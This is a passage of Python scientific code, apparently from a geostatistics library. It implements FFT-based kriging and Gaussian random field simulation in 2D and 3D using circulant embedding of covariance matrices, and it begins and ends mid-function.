print('KRIGE2D: computing kriging estimates...')
krig[indnc] = np.dot(rBArAAinv, v)
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE2D: computing kriging standard deviation ...')
for j in range(nnc):
krigSD[indnc[j]] = np.dot(rBArAAinv[j,:], rBA[j,:])
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(rBA)
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if not computeKrigSD:
del(ccirc)
if printInfo:
print('KRIGE2D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iy * N1 + ix
indncEmb = ky * N1 + kx
# Compute kriging estimates
if printInfo:
print('KRIGE2D: computing kriging estimates...')
# Compute
# u = rAA^(-1) * v, and then
# Z = rBA * u via the circulant embedding of the covariance matrix
uEmb = np.zeros(N2*N1)
uEmb[indcEmb] = np.linalg.solve(rAA, v)
Z = np.fft.ifft2(lam * np.fft.fft2(uEmb.reshape(N2, N1)))
# ...note that Im(Z) = 0
krig[indnc] = np.real(Z.reshape(-1)[indncEmb])
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE2D: computing kriging standard deviation ...')
for j in range(nnc):
u = ccirc[np.mod(iy - ky[j], N2), np.mod(ix - kx[j], N1)] # j-th row of rBA
krigSD[indnc[j]] = np.dot(u,np.linalg.solve(rAA, u))
del(ccirc)
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(ix, iy, kx, ky)
# ... update if non stationary covariance is specified
if var is not None:
if var.size > 1:
krig = varUpdate.reshape(-1) * krig
if computeKrigSD:
krigSD = varUpdate.reshape(-1) * krigSD
krig.resize(ny, nx)
if computeKrigSD:
krigSD.resize(ny, nx)
krig = krig + mean
if computeKrigSD:
return ([krig, krigSD])
else:
return (krig)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def grf3D(cov_model, dimension, spacing, origin=[0., 0., 0.],
nreal=1, mean=0, var=None,
x=None, v=None,
extensionMin=None, crop=True,
method=3, conditioningMethod=2,
measureErrVar=0., tolInvKappa=1.e-10,
printInfo=True):
"""
Generates gaussian random fields (GRF) in 3D via FFT.
The GRFs:
- are generated using the given covariance model / function,
- have specified mean (mean) and variance (var), which can be non stationary
- are conditioned to location x with value v
Notes:
1) For reproducing covariance model, the dimension of GRF should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large conditional simulations with large data set:
- conditioningMethod should be set to 2 for using FFT in conditioning step
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix for conditioning locations (solving linear system)
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 3, or
1-dimensional array of dim 3) are 3D-lag(s)
(CovModel3D class) covariance model in 3D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 3 ints) [nx, ny, nz], number of cells
in x-, y-, z-axis direction
:param spacing: (sequence of 3 float) [dx, dy, dz], spacing between
two adjacent cells in x-, y-, z-axis direction
:param origin: (sequence of 3 float) [ox, oy, oz], origin of the 2D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny*nz values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny*nz values (reshaped if needed)
:param x: (2-dimensional array of dim n x 3, or
1-dimensional array of dim 3 or None) coordinate of
conditioning points (None for unconditional GRF)
:param v: (1-dimensional array or float or None) value at
conditioning points (length n)
:param extensionMin: (sequence of 3 ints) minimal extension in nodes in
in x-, y-, z-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as first argument)
:param crop: (bool) indicates if the extended generated field will
be cropped to original dimension; note that no cropping
is not valid with conditioning or non stationary mean
or variance
:param method: (int) indicates which method is used to generate
unconditional simulations; for each method the DFT "lam"
of the circulant embedding of the covariance matrix is
used, and periodic and stationary GRFs are generated;
possible values:
1: method A:
generate one GRF Z as follows:
- generate one real gaussian white noise W
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
2: method B: NOT IMPLEMENTED!!!
generate one GRF Z as follows:
- generate directly X (of method A)
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
3: method C:
generate two independent GRFs Z1, Z2 as follows:
- generate two independant real gaussian white
noises W1, W2 and set W = W1 + i * W2
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z,
and set Z1 = Re(Z), Z2 = Im(Z)
note: if nreal is odd, the last field is
generated using method A
:param conditioningMethod:
(int) indicates which method is used to update simulation
for accounting conditioning data.
Let
A: index of conditioning nodes
B: index of non-conditioning nodes
Zobs: vector of values of the unconditional
simulation Z at conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, an unconditional simulation Z is updated
into a conditional simulation ZCond as follows:
Let
ZCond[A] = Zobs
ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
(that is the update consists in adding the kriging
estimates of the residues to the unconditional
simulation); possible values for conditioningMethod:
1: method CondtioningA:
the matrix M = rBA * rAA^(-1) is explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for each simulation: the linear system
rAA * x = Zobs - Z[A]
is solved and then, the multiplication by rBA
is done via fft
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
(Ignored if x is None, i.e. unconditional simulations)
:param tolInvKappa: (float >0) used only for conditioning, the simulation is
stopped if the inverse of the condition number of rAA
is above tolInvKappa
:param printInfo: (bool) indicates if some info is printed in stdout
:return grf: (4-dimensional array of dim nreal x n3 x n2 x n1) nreal GRFs
with n1 = nx, n2 = ny, n3 = nz if crop = True,
and n1 >= nx, n2 >= ny, n3 >= nz otherwise;
grf[i] is the i-th realization
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 x N3 is given by
c = DFT(x) = F * x
where F is the the (N1*N2*N3) x (N1*N2*N3) matrix with coefficients
F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2*N3) )], j=(j1,j2,j3), k=(k1,k2,k3) in G,
and
G = {n=(n1,n2,n3), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1, 0 <= n3 <= N3-1}
denotes the indices grid
and where we use the bijection
(n1,n2,n3) in G -> n1 + n2 * N1 + n3 * N1 * N2 in {0,...,N1*N2*N3-1},
between the multiple-indices and the single indices
With N = N1*N2*N3, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fftn() = DFT
numpy.fft.ifftn() = DFT^(-1)
"""
# Check first argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel3D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (first argument) is not valid")
return
# Number of realization(s)
nreal = int(nreal) # cast to int if needed
if nreal <= 0:
if printInfo:
print('GRF3D: nreal = 0: nothing to do!')
return()
if printInfo:
print('GRF3D: Preliminary computation...')
#### Preliminary computation ####
nx, ny, nz = dimension
dx, dy, dz = spacing
# ox, oy, oz = origin
nxy = nx*ny
nxyz = nxy * nz
if method not in (1, 2, 3):
print('ERROR (GRF3D): invalid method')
return
if method == 2:
print('ERROR (GRF3D): Unconditional simulation: "method=2" not implemented...')
return
if x is not None:
if conditioningMethod not in (1, 2):
print('ERROR (GRF3D): invalid method for conditioning')
return
x = np.asarray(x).reshape(-1,3) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxyz:
print('ERROR (GRF3D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxyz:
print('ERROR (GRF3D): number of entry for "var"...')
return
var = np.asarray(var).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if not crop:
if x is not None: # conditional simulation
print('ERROR (GRF3D): "no crop" is not valid with conditional simulation')
return
if mean.size > 1:
print('ERROR (GRF3D): "no crop" is not valid with non stationary mean')
return
if var is not None and var.size > 1:
print('ERROR (GRF3D): "no crop" is not valid with non stationary variance')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxyz(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1, nz-1] # default
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
N3min = nz + extensionMin[2]
if printInfo:
print('GRF3D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2,N3)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
# N3 = 2^g3 (a power of 2), with N3 >= N3min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
g3 = int(np.ceil(np.log2(N3min)))
N1 = int(2**g1)
N2 = int(2**g2)
N3 = int(2**g3)
if printInfo:
print('GRF3D: Embedding dimension: {} x {} x {}'.format(N1, N2, N3))
N12 = N1*N2
N = N12 * N3
# ccirc: coefficient of the embedding matrix, (N3, N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
L3 = int (N3/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
h3 = np.arange(-L3, L3, dtype=float) * dz # [-L3 ... 0 ... L3-1] * dz
hh = np.meshgrid(h2, h3, h1) # as this! hh[i]: (N3, N2, N1) array
# hh[0]: y-coord, hh[1]: z-coord, hh[2]: x-coord
ccirc = cov_func(np.hstack((hh[2].reshape(-1,1), hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N3, N2, N1)
del(h1, h2, h3, hh)
# ...shift first L1 index to the end of the axis 2:
ind = np.arange(L1)
ccirc = ccirc[:,:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 1:
ind = np.arange(L2)
ccirc = ccirc[:, np.hstack((ind+L2, ind)), :]
# ...shift first L3 index to the end of the axis 0:
ind = np.arange(L3)
ccirc = ccirc[np.hstack((ind+L3, ind)), :,:]
del(ind)
if printInfo:
print('GRF3D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (3-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2,k3), 0<=k1<=N1-1, 0<=k2<=N2-1, 0<=k3<=N3-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k1,k2,k3) = lam(N1-k1,N2-k2,N3-k3), 1<=k1<=N1-1, 1<=k2<=N2-1, 1<=k3<=N3-1, because the coefficients ccirc are real
lam = np.real(np.fft.fftn(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
if x is None or conditioningMethod == 1:
del(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(3)))
# Dealing with conditioning
# -------------------------
if x is not None:
if printInfo:
print('GRF3D: Treatment of conditioning data...')
# Compute the part rAA of the covariance matrix
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
if printInfo:
print('GRF3D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 3
ix, iy, iz = indc[:, 0], indc[:, 1], indc[:, 2]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (GRF3D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (GRF3D): a conditioning point is out of the grid (y-direction)')
return
if sum(iz < 0) > 0 or sum(iz >= nz):
print('ERROR (GRF3D): a conditioning point is out of the grid (z-direction)')
return
indc = ix + iy * nx + iz * nxy # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (GRF3D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iz[j]-iz[i], N3), np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF3D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxyz), indc), dtype=int)
nnc = len(indnc)
kz = np.floor_divide(indnc, nxy)
kk = np.mod(indnc, nxy)
ky = np.floor_divide(kk, nx)
kx = np.mod(kk, nx)
del(kk)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF3D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iz[j] - kz, N3), np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
if printInfo:
print('GRF3D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA, rBA)
# If a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# Hence, if a non stationary variance is specified,
# the matrix rBA * rAA^(-1) should be consequently updated
# by multiplying its columns by 1/varUpdate[indc] and its rows by varUpdate[indnc]
if var is not None and var.size > 1:
rBArAAinv = np.transpose(varUpdate.reshape(-1)[indnc] * np.transpose(1./varUpdate.reshape(-1)[indc] * rBArAAinv))
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if printInfo:
print('GRF3D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iz * N12 + iy * N1 + ix
indncEmb = kz * N12 + ky * N1 + kx
del(ix, iy, iz, kx, ky, kz)
del(ccirc)
#### End of preliminary computation ####
# Unconditional simulation
# ========================
# Method A: Generating one real GRF Z
# --------
# 1. Generate a real gaussian white noise W ~ N(0,1) on G (3D grid)
# 2. Compute Z = Q^(*) D Q * W
# [OR: Z = Q D Q^(*) * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = DFT^(-1)(D * DFT(W))
# [OR: Z = DFT(D * DFT^(-1)(W))]
#
# Method B: Generating one real GRF Z
# --------
# Not implemented
#
# Method C: Generating two independent real GRFs Z1, Z2
# --------
# (If nreal is odd, the last realization is generated using method A.)
# 1. Generate two independent real gaussian white noises W1,W2 ~ N(0,1) on G (3D grid)
# and let W = W1 + i * W2 (complex value)
# 2. Compute Z = Q^(*) D * W
# [OR: Z = Q D * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * W)
# [OR: Z = 1/N^(1/2) * DFT(D * W)]
# Then the real and imaginary parts of Z are two independent GRFs
if crop:
grfNx, grfNy, grfNz = nx, ny, nz
else:
grfNx, grfNy, grfNz = N1, N2, N3
grf = np.zeros((nreal, grfNz, grfNy, grfNx))
if method == 1:
# Method A
# --------
for i in range(nreal):
if printInfo:
print('GRF3D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
W = np.random.normal(size=(N3, N2, N1))
Z = np.fft.ifftn(lamSqrt * np.fft.fftn(W))
# ...note that Im(Z) = 0
grf[i] = np.real(Z[0:grfNz, 0:grfNy, 0:grfNx])
elif method == 2:
# Method B
# --------
print('ERROR (GRF3D): Unconditional simulation: "method=2" not implemented...')
return
elif method == 3:
# Method C
# --------
for i in np.arange(0, nreal-1, 2):
if printInfo:
print('GRF3D: Unconditional simulation {:4d}-{:4d} of {:4d}...'.format(i+1, i+2, nreal))
W = np.array(np.random.normal(size=(N3, N2, N1)), dtype=complex)
W.imag = np.random.normal(size=(N3, N2, N1))
Z = np.sqrt(N) * np.fft.ifftn(lamSqrt * W)
# Z = 1/np.sqrt(N) * np.fft.fftn(lamSqrt * W)] # see above: [OR:...]
grf[i] = np.real(Z[0:grfNz, 0:grfNy, 0:grfNx])
grf[i+1] = np.imag(Z[0:grfNz, 0:grfNy, 0:grfNx])
if np.mod(nreal, 2) == 1:
if printInfo:
print('GRF3D: Unconditional simulation {:4d} of {:4d}...'.format(nreal, nreal))
W = np.random.normal(size=(N3, N2, N1))
Z = np.fft.ifftn(lamSqrt * np.fft.fftn(W))
# ...note that Im(Z) = 0
grf[nreal-1] = np.real(Z[0:grfNz, 0:grfNy, 0:grfNx])
if var is not None:
grf = varUpdate * grf
grf = mean + grf
# Conditional simulation
# ----------------------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, from an unconditional simulation Z, we retrieve a conditional
# simulation ZCond as follows.
# Let
# ZCond[A] = Zobs
# ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
if x is not None:
# We work with single indices...
grf.resize(nreal, grfNx*grfNy*grfNz)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF3D: Updating conditional simulations...')
# Update all simulations at a time,
# use the matrix rBA * rAA^(-1) already computed
grf[:,indnc] = grf[:,indnc] + np.transpose(np.dot(rBArAAinv, np.transpose(v - grf[:,indc])))
grf[:,indc] = v
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
# Update each simulation successively as follows:
# - solve rAA * x = Zobs - z[A]
# - do the multiplication rBA * x via the circulant embedding of the
# covariance matrix (using fft)
rAAinvResiduEmb = np.zeros(N3*N2*N1)
for i in range(nreal):
if printInfo:
print('GRF3D: Updating conditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
# Compute residue
residu = v - grf[i,indc]
# ... update if non stationary variance is specified
if var is not None and var.size > 1:
residu = 1./varUpdate.reshape(-1)[indc] * residu
# Compute
# x = rAA^(-1) * residu, and then
# Z = rBA * x via the circulant embedding of the covariance matrix
rAAinvResiduEmb[indcEmb] = np.linalg.solve(rAA, residu)
Z = np.fft.ifftn(lam * np.fft.fftn(rAAinvResiduEmb.reshape(N3, N2, N1)))
# ...note that Im(Z) = 0
Z = np.real(Z.reshape(-1)[indncEmb])
# ... update if non stationary covariance is specified
if var is not None and var.size > 1:
Z = varUpdate.reshape(-1)[indnc] * Z
grf[i, indnc] = grf[i, indnc] + Z
grf[i, indc] = v
# Reshape grf as initially
grf.resize(nreal, grfNz, grfNy, grfNx)
return (grf)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def krige3D(x, v, cov_model, dimension, spacing, origin=[0., 0., 0.],
mean=0, var=None,
extensionMin=None,
conditioningMethod=1, # note: set conditioningMethod=2 if unable to allocate memory
measureErrVar=0., tolInvKappa=1.e-10,
computeKrigSD=True,
printInfo=True):
"""
Computes kriging estimates and standard deviation in 3D via FFT.
It is a simple kriging
- of value v at location x,
- based on the covariance model / function,
- with a specified mean (mean) and variance (var), which can be non stationary
Notes:
1) For reproducing covariance model, the dimension of field/domain should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large data set:
- conditioningMethod should be set to 2 for using FFT
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix (solving linear system)
:param x: (2-dimensional array array of dim n x 3) coordinate of data points
:param v: (1-dimensional array length n) value at data points
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 3, or
1-dimensional array of dim 3) are 3D-lag(s)
(CovModel3D class) covariance model in 3D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 3 ints) [nx, ny, nz], number of cells
in x-, y-, z-axis direction
:param spacing: (sequence of 3 float) [dx, dy, dz], spacing between
two adjacent cells in x-, y-, z-axis direction
:param origin: (sequence of 3 float) [ox, oy, oz], origin of the 2D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny*nz values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny*nz values (reshaped if needed)
:param extensionMin: (sequence of 3 ints) minimal extension in nodes in
in x-, y-, z-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as third argument)
:param conditioningMethod:
(int) indicates which method is used to perform kriging.
Let
A: index of conditioning (data) nodes
B: index of non-conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, thre kriging estimates and variance are
krig[B] = mean + rBA * rAA^(-1) * (v - mean)
krigVar[B] = diag(rBB - rBA * rAA^(-1) * rAB)
The computation is done in a way depending on the
following possible values for conditioningMethod:
1: method CondtioningA:
the matrices rBA, RAA^(-1) are explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for kriging estimates:
the linear system
rAA * y = (v - mean)
is solved, and then
mean + rBA*y
is computed
for kriging variances:
for each column u[j] of rAB, the linear
system
rAA * y = u[j]
is solved, and then
rBB[j,j] - y^t*y
is computed
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
:param tolInvKappa: (float >0) the function is stopped if the inverse of
the condition number of rAA is above tolInvKappa
:param computeKrigSD:
(bool) indicates if the standard deviation of kriging is computed
:param printInfo: (bool) indicates if some info is printed in stdout
:return ret: two possible cases:
ret = [krig, krigSD] if computeKrigSD is equal to True
ret = krig if computeKrigSD is equal to False
where
krig: (3-dimensional array of dim nz x ny x nx)
kriging estimates
krigSD: (3-dimensional array of dim nz x ny x nx)
kriging standard deviation
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 x N3 is given by
c = DFT(x) = F * x
where F is the the (N1*N2*N3) x (N1*N2*N3) matrix with coefficients
F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2*N3) )], j=(j1,j2,j3), k=(k1,k2,k3) in G,
and
G = {n=(n1,n2,n3), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1, 0 <= n3 <= N3-1}
denotes the indices grid
and where we use the bijection
(n1,n2,n3) in G -> n1 + n2 * N1 + n3 * N1 * N2 in {0,...,N1*N2*N3-1},
between the multiple-indices and the single indices
With N = N1*N2*N3, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fftn() = DFT
numpy.fft.ifftn() = DFT^(-1)
"""
# Check third argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel3D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (third argument) is not valid")
return
# Check conditioning method
if conditioningMethod not in (1, 2):
print('ERROR (KRIGE3D): invalid method!')
return
nx, ny, nz = dimension
dx, dy, dz = spacing
# ox, oy, oz = origin
nxy = nx*ny
nxyz = nxy * nz
x = np.asarray(x).reshape(-1,3) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxyz:
print('ERROR (KRIGE3D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxyz:
print('ERROR (KRIGE3D): number of entry for "var"...')
return
var = np.asarray(var).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxyz(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1, nz-1] # default
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
N3min = nz + extensionMin[2]
if printInfo:
print('KRIGE3D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2,N3)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
# N3 = 2^g3 (a power of 2), with N3 >= N3min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
g3 = int(np.ceil(np.log2(N3min)))
N1 = int(2**g1)
N2 = int(2**g2)
N3 = int(2**g3)
if printInfo:
print('KRIGE3D: Embedding dimension: {} x {} x {}'.format(N1, N2, N3))
N12 = N1*N2
N = N12 * N3
# ccirc: coefficient of the embedding matrix, (N3, N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
L3 = int (N3/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
h3 = np.arange(-L3, L3, dtype=float) * dz # [-L3 ... 0 ... L3-1] * dz
hh = np.meshgrid(h2, h3, h1) # as this! hh[i]: (N3, N2, N1) array
# hh[0]: y-coord, hh[1]: z-coord, hh[2]: x-coord
ccirc = cov_func(np.hstack((hh[2].reshape(-1,1), hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N3, N2, N1)
del(h1, h2, h3, hh)
# ...shift first L1 index to the end of the axis 2:
ind = np.arange(L1)
ccirc = ccirc[:,:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 1:
ind = np.arange(L2)
ccirc = ccirc[:, np.hstack((ind+L2, ind)), :]
# ...shift first L3 index to the end of the axis 0:
ind = np.arange(L3)
ccirc = ccirc[np.hstack((ind+L3, ind)), :,:]
del(ind)
if printInfo:
print('KRIGE3D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (3-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2,k3), 0<=k1<=N1-1, 0<=k2<=N2-1, 0<=k3<=N3-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
